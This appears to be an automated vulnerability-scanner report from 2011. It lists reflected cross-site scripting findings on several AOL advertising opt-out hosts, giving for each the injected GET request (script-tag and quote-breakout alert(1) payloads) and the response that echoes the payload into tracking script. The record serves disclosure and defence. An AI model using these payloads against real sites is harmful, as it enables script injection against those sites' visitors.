HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:40 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13736 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php49125"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverwc |
Path: | /nai/daa.php |
GET /nai/daa.phpbf266"><script>alert(1)< Host: nai.adserverwc.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13806 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adsonar.com |
Path: | /nai/daa.php |
GET /naif97cb"-alert(1)- Host: nai.adsonar.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: oo_flag=t |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:51 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13712 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/naif97cb"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adsonar.com |
Path: | /nai/daa.php |
GET /naif56a7"><script>alert(1)< Host: nai.adsonar.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: oo_flag=t |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:47 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:47 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13782 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.adsonar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adsonar.com |
Path: | /nai/daa.php |
GET /nai/daa.php71dba"-alert(1)- Host: nai.adsonar.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: oo_flag=t |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:06 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13712 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php71dba"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adsonar.com |
Path: | /nai/daa.php |
GET /nai/daa.php5c495"><script>alert(1)< Host: nai.adsonar.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: oo_flag=t |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:02 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13782 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.adsonar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adtech.de |
Path: | /nai/daa.php |
GET /nai1781b"><script>alert(1)< Host: nai.adtech.de Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:14 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13778 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.adtech ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adtech.de |
Path: | /nai/daa.php |
GET /naiab3fa"-alert(1)- Host: nai.adtech.de Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:20 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13708 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/naiab3fa"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adtech.de |
Path: | /nai/daa.php |
GET /nai/daa.php6425c"><script>alert(1)< Host: nai.adtech.de Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:31 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:31 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13778 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.adtech ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adtech.de |
Path: | /nai/daa.php |
GET /nai/daa.php8f97c"-alert(1)- Host: nai.adtech.de Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:35 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:35 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13708 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php8f97c"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.advertising |
Path: | /nai/daa.php |
GET /naif9692"><script>alert(1)< Host: nai.advertising.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=optout! |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:47 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:47 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13790 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.advertising |
Path: | /nai/daa.php |
GET /nai15a45"-alert(1)- Host: nai.advertising.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=optout! |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:50 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13720 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai15a45"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.advertising |
Path: | /nai/daa.php |
GET /nai/daa.php941a2"><script>alert(1)< Host: nai.advertising.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=optout! |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:00 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13790 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.advertising |
Path: | /nai/daa.php |
GET /nai/daa.phpcdd85"-alert(1)- Host: nai.advertising.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=optout! |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:04 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13720 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.phpcdd85"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/book/book.css |
GET /modules62647"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:36:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:36:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/book/book.css |
GET /modules924f9"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:36:56 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:36:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... =s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules924f9"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/book/book.css |
GET /modules/booka4b49"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:28 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:28 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/book/book.css |
GET /modules/bookd23fc"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:34 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:34 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... ('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/book/book.css |
GET /modules/book/book.cssf73d0"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/book/book.css |
GET /modules/book/book.css71189"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:41 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:41 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/node/node.css |
GET /modulesb5acb"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:16 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/node/node.css |
GET /modules5557a"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
